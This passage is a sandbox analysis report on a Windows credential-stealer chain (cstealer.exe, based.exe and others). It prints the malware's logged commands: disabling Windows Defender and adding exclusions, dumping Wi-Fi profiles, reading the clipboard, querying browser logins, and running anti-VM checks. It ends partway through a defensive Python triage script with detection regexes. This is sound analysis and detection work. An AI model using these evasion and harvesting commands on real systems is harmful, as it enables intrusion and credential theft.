                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: String function: 00007FF8A7DA8810 appears 31 times
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: String function: 00007FF8A8036988 appears 51 times
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: String function: 00007FF8A8036889 appears 31 times
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: String function: 00007FF8A803300D appears 55 times
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: String function: 00007FF6957E2B10 appears 47 times
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: String function: 00007FF8A7DA9620 appears 175 times
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: String function: 00007FF8A7DCEF60 appears 40 times
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: String function: 00007FF8A80324B9 appears 83 times
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: String function: 00007FF8A8031EF1 appears 1586 times
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: String function: 00007FF8A8034057 appears 780 times
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: String function: 00007FF8A7DA89E0 appears 123 times
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: String function: 00007FF8A8032734 appears 510 times
                                Source: C:\Users\user\AppData\Local\Temp\main.exeCode function: String function: 00007FF6D6E92B10 appears 47 times
                                Source: unicodedata.pyd.2.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                                Source: unicodedata.pyd.4.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                                Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
                                Source: DevxExecutor.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                                Source: libcrypto-1_1.dll.4.drStatic PE information: Section: UPX1 ZLIB complexity 0.9987754672181373
                                Source: python311.dll.4.drStatic PE information: Section: UPX1 ZLIB complexity 0.9993579269724483
                                Source: unicodedata.pyd.4.drStatic PE information: Section: UPX1 ZLIB complexity 0.9937485999103942
                                Source: classification engineClassification label: mal100.rans.troj.spyw.evad.winEXE@191/263@5/4
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 3_2_00007FF6957E8770 GetLastError,FormatMessageW,WideCharToMultiByte,3_2_00007FF6957E8770
                                Source: C:\ProgramData\setup.exeFile created: C:\Program Files\Google\Chrome\updater.exe
                                Source: C:\Users\user\Desktop\DevxExecutor.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\DevxExecutor.exe.logJump to behavior
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8704:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6352:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6104:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7584:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4760:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8624:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1080:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8228:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7560:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7976:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7704:120:WilError_03
                                Source: C:\ProgramData\main.exeMutant created: \Sessions\1\BaseNamedObjects\CosturaA54E036D2DCD19384E8EA53862E0DD8F
                                Source: C:\Users\user\Desktop\DevxExecutor.exeMutant created: \Sessions\1\BaseNamedObjects\2tHCwnGTxPSY0oYKn
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8904:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9044:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7236:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8236:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8248:120:WilError_03
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1776:120:WilError_03
                                Source: C:\ProgramData\Microsoft\based.exeMutant created: \Sessions\1\BaseNamedObjects\d
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5136:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7472:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2696:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7916:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9124:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2272:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8736:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8352:120:WilError_03
                                Source: C:\Users\user\Desktop\DevxExecutor.exeFile created: C:\Users\user\AppData\Local\Temp\cstealer.exeJump to behavior
                                Source: C:\ProgramData\main.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Local\Temp\tmp7F1E.tmp.bat & Del C:\Users\user\AppData\Local\Temp\tmp7F1E.tmp.bat
                                Source: DevxExecutor.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                Source: DevxExecutor.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                                Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                                Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                                Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                                Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                                Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE ProcessId = 7796
                                Source: C:\Users\user\Desktop\DevxExecutor.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                                Source: C:\Users\user\Desktop\DevxExecutor.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                                Source: cstealer.exe, 00000003.00000002.2671730030.00000271DA1A0000.00000004.00001000.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2339606030.0000020102E30000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: SELECT action_url, username_value, password_value FROM logins;
                                Source: cstealer.exe, 00000009.00000002.2451739427.00007FF8A7ECA000.00000002.00000001.01000000.00000032.sdmp | Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                                Source: cstealer.exe, 00000009.00000002.2451739427.00007FF8A7ECA000.00000002.00000001.01000000.00000032.sdmp | Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                                Source: cstealer.exe, 00000009.00000002.2451739427.00007FF8A7ECA000.00000002.00000001.01000000.00000032.sdmp | Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                                Source: cstealer.exe, 00000009.00000002.2451739427.00007FF8A7ECA000.00000002.00000001.01000000.00000032.sdmp | Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                                Source: cstealer.exe, cstealer.exe, 00000009.00000002.2451739427.00007FF8A7ECA000.00000002.00000001.01000000.00000032.sdmp | Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
                                Source: cstealer.exe, 00000009.00000002.2451739427.00007FF8A7ECA000.00000002.00000001.01000000.00000032.sdmp | Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
                                Source: cstealer.exe, 00000009.00000002.2451739427.00007FF8A7ECA000.00000002.00000001.01000000.00000032.sdmp | Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
                                Source: DevxExecutor.exe | ReversingLabs: Detection: 52%
                                Source: DevxExecutor.exe | Virustotal: Detection: 53%
                                Source: main.exe | String found in binary or memory: --help
                                Source: main.exe | String found in binary or memory: --help
                                Source: main.exe | String found in binary or memory: command-line parameters (see --help for details): PYTHONDEBUG : enable parser debug mode (-d) PYTHONDONTWRITEBYTECODE : don't write .pyc files (-B) PYTHONINSPECT : inspect interactively after running script (-i) PYTHONNOUSERSITE :
                                Source: main.exe | String found in binary or memory: command-line parameters (see --help for details): PYTHONDEBUG : enable parser debug mode (-d) PYTHONDONTWRITEBYTECODE : don't write .pyc files (-B) PYTHONINSPECT : inspect interactively after running script (-i) PYTHONNOUSERSITE :
                                Source: main.exe | String found in binary or memory: can't send non-None value to a just-started generator
                                Source: unknown | Process created: C:\Users\user\Desktop\DevxExecutor.exe "C:\Users\user\Desktop\DevxExecutor.exe"
                                Source: C:\Users\user\Desktop\DevxExecutor.exe | Process created: C:\Users\user\AppData\Local\Temp\cstealer.exe "C:\Users\user\AppData\Local\Temp\cstealer.exe"
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | Process created: C:\Users\user\AppData\Local\Temp\cstealer.exe "C:\Users\user\AppData\Local\Temp\cstealer.exe"
                                Source: C:\Users\user\Desktop\DevxExecutor.exe | Process created: C:\Users\user\AppData\Local\Temp\main.exe "C:\Users\user\AppData\Local\Temp\main.exe"
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
                                Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\cstealer.exe "C:\Users\user\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
                                Source: C:\Users\user\AppData\Local\Temp\main.exe | Process created: C:\Users\user\AppData\Local\Temp\main.exe "C:\Users\user\AppData\Local\Temp\main.exe"
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | Process created: C:\Users\user\AppData\Local\Temp\cstealer.exe "C:\Users\user\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
                                Source: C:\Users\user\AppData\Local\Temp\main.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c start C:\Users\user\AppData\Local\Temp\_MEI67202\Build.exe -pbeznogym
                                Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\_MEI67202\Build.exe C:\Users\user\AppData\Local\Temp\_MEI67202\Build.exe -pbeznogym
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
                                Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\cstealer.exe "C:\Users\user\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
                                Source: C:\Users\user\AppData\Local\Temp\_MEI67202\Build.exe | Process created: C:\ProgramData\Microsoft\hacn.exe "C:\ProgramData\Microsoft\hacn.exe"
                                Source: C:\Users\user\AppData\Local\Temp\_MEI67202\Build.exe | Process created: C:\ProgramData\Microsoft\based.exe "C:\ProgramData\Microsoft\based.exe"
                                Source: C:\ProgramData\Microsoft\based.exe | Process created: C:\ProgramData\Microsoft\based.exe "C:\ProgramData\Microsoft\based.exe"
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | Process created: C:\Users\user\AppData\Local\Temp\cstealer.exe "C:\Users\user\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
                                Source: C:\ProgramData\Microsoft\hacn.exe | Process created: C:\ProgramData\Microsoft\hacn.exe "C:\ProgramData\Microsoft\hacn.exe"
                                Source: C:\ProgramData\Microsoft\hacn.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c start C:\Users\user\AppData\Local\Temp\_MEI47682\s.exe -pbeznogym
                                Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\_MEI47682\s.exe C:\Users\user\AppData\Local\Temp\_MEI47682\s.exe -pbeznogym
                                Source: C:\ProgramData\Microsoft\based.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'"
                                Source: C:\ProgramData\Microsoft\based.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                                Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\ProgramData\Microsoft\based.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('You are using the wrong Windows version or a VM got detected!', 0, 'Info!', 48+16);close()""
                                Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'
                                Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                                Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\mshta.exe mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('You are using the wrong Windows version or a VM got detected!', 0, 'Info!', 48+16);close()"
                                Source: C:\ProgramData\Microsoft\based.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\? ??.scr'"
                                Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\? ??.scr'
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
                                Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\ProgramData\Microsoft\based.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                Source: C:\ProgramData\Microsoft\based.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
                                Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
                                Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\cstealer.exe "C:\Users\user\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
                                Source: C:\Users\user\AppData\Local\Temp\_MEI47682\s.exe | Process created: C:\ProgramData\main.exe "C:\ProgramData\main.exe"
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | Process created: C:\Users\user\AppData\Local\Temp\cstealer.exe "C:\Users\user\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
                                Source: C:\ProgramData\Microsoft\based.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
                                Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
                                Source: C:\ProgramData\Microsoft\based.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
                                Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\ProgramData\Microsoft\based.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
                                Source: C:\Users\user\AppData\Local\Temp\_MEI47682\s.exe | Process created: C:\ProgramData\svchost.exe "C:\ProgramData\svchost.exe"
                                Source: C:\Users\user\AppData\Local\Temp\_MEI47682\s.exe | Process created: C:\ProgramData\setup.exe "C:\ProgramData\setup.exe"
                                Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                                Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                Source: C:\ProgramData\Microsoft\based.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
                                Source: C:\ProgramData\Microsoft\based.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
                                Source: C:\ProgramData\Microsoft\based.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "systeminfo"
                                Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\tree.com tree /A /F
                                Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\systeminfo.exe systeminfo
                                Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\netsh.exe netsh wlan show profile
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
                                Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\cstealer.exe "C:\Users\user\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
                                Source: C:\ProgramData\Microsoft\based.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand [encoded command omitted]
                                Source: C:\ProgramData\Microsoft\based.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
                                Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\tree.com tree /A /F
                                Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand [encoded command omitted]
                                Source: C:\ProgramData\svchost.exe | Process created: C:\ProgramData\svchost.exe "C:\ProgramData\svchost.exe"
                                Source: C:\ProgramData\Microsoft\based.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
                                Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\tree.com tree /A /F
                                Source: C:\ProgramData\Microsoft\based.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "getmac"
                                Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\getmac.exe getmac
                                Source: C:\ProgramData\main.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Local\Temp\tmp7F1E.tmp.bat & Del C:\Users\user\AppData\Local\Temp\tmp7F1E.tmp.bat
                                Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\tasklist.exe Tasklist /fi "PID eq 7796"
                                Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\find.exe find ":"
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | Process created: C:\Users\user\AppData\Local\Temp\cstealer.exe "C:\Users\user\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
                                Source: C:\ProgramData\Microsoft\based.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
                                Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\tree.com tree /A /F
                                Source: C:\ProgramData\svchost.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "ver"
                                Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\System32\conhost.exe | Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\ProgramData\Microsoft\based.exe | Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\ProgramData\Microsoft\based.exe | Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
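The process-creation evidence above is the raw material for a triage rule. The following Python script is an added example, not part of the Joe Sandbox report and not code from the sample: it parses lines in the report's "Source: ... Process created: ..." shape, rebuilds the parent-to-child spawn map and flags the behaviours that appear in this chain (Defender tampering and exclusions, inline mshta JavaScript, netsh wlan profile dumping, SecurityCenter2 AV enumeration, host-recon LOLBins, pip installs at runtime, self-deleting batch files, and system-named binaries such as svchost.exe outside System32). The twelve sample lines embedded in it are constructed copies of entries from this report; the rule names, the regular expressions and the list of system binary names are the example's own assumptions, not Joe Sandbox signatures.

```python
"""Triage "Process created" evidence lines from a sandbox report.

Parses each line into (parent, image, command line), rebuilds the
parent->child spawn map and flags the behaviours a responder escalates on.
"""
import re
from collections import defaultdict

# One evidence line: "Source: <parent> | Process created: <image> <cmdline>".
# The separator is optional so the run-together "...exeProcess created:" form
# seen in text extractions of these reports parses as well.
LINE_RE = re.compile(
    r"^Source:\s*(?P<parent>.*?)\s*\|?\s*Process created:\s*(?P<image>\S+)\s*(?P<cmdline>.*)$"
)

# Rules matched case-insensitively against the child's command line. The rule
# names are this example's own, not Joe Sandbox signature names.
RULES = [
    ("defender_tamper",
     r"set-mppreference\b.*-disable\w+\s+\$true|mpcmdrun\.exe.*-removedefinitions"),
    ("defender_exclusion", r"add-mppreference\b.*-exclusionpath"),
    ("ps_encoded_or_bypass",
     r"powershell(?:\.exe)?\b.*(?:-encodedcommand|-executionpolicy\s+bypass)"),
    ("mshta_inline_script", r'^mshta(?:\.exe)?\s+"?(?:javascript|vbscript):'),
    ("wifi_profile_dump", r"netsh\s+wlan\s+show\s+profile"),
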